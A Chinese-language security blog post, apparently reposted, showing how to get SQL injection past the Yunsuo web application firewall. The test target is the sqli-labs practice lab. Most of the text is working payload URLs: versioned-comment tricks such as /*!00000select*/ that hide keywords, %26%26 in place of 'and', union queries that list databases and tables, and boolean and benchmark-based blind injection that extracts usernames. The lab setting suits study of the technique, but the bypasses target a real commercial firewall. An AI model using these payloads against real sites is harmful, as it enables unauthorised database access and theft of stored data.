标签:00000select 20 26% WAF 192.168 云锁 sqli 最新版 schema
作者:ghtwf01@星盟安全团队
前言
这里使用sqli-labs
第一关字符型注入来测试
绕过and 1=1
直接使用and 1=1
肯定会被拦截
使用%26%26
即可代替and
绕过,1=1
可以用True
表示,1=2
可以用False
表示
绕过order by
直接使用order by
被拦截
使用order/*!60000ghtwf01*/by
绕过
绕过union select
和order by
一样绕过姿势,使用union/*!60000ghtwf01*/select
绕过
查询数据库名
过滤了group_concat()
,限制了select
与from
的结合,from.
无法绕过,使用/*!00000select*/
绕过
http://192.168.0.7/sqli/Less-1/?id=0%27%20union/*!60000ghtwf01*//*!00000select*/%201,2,schema_name%20from%20information_schema.schemata%20limit%200,1--+
查询表名
http://192.168.0.7/sqli/Less-1/?id=0%27%20union/*!60000ghtwf01*//*!00000select*/%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%200,1--+
查询列名
查询字段
盲注
布尔盲注
查询数据库名长度
http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20length(database/**/())=8%20--+
查询第一个数据库名第一个字母ascii()
、hex()
均未被过滤,限制select
与from
的结合,使用/*!00000select*/
http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(ascii(substr((/*!00000select*/%20schema_name%20from%20information_schema.schemata%20limit%200,1),1,1))=105)%20--+
http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(hex(substr((/*!00000select*/%20table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%200,1),1,1))=65)%20--+
http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(hex(substr((/*!00000select*/%20column_name%20from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20%26%26%20table_name=0x7573657273%20limit%200,1),1,1))=69)%20--+
http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(hex(substr((/*!00000select*/%20username%20from%20users%20limit%200,1),1,1))=44)%20--+
时间盲注
过滤了sleep()
函数,使用benchmark()
函数即可,查询规则参考上面布尔盲注
标签:00000select,20,26%,WAF,192.168,云锁,sqli,最新版,schema 来源: https://www.cnblogs.com/0daybug/p/12750072.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。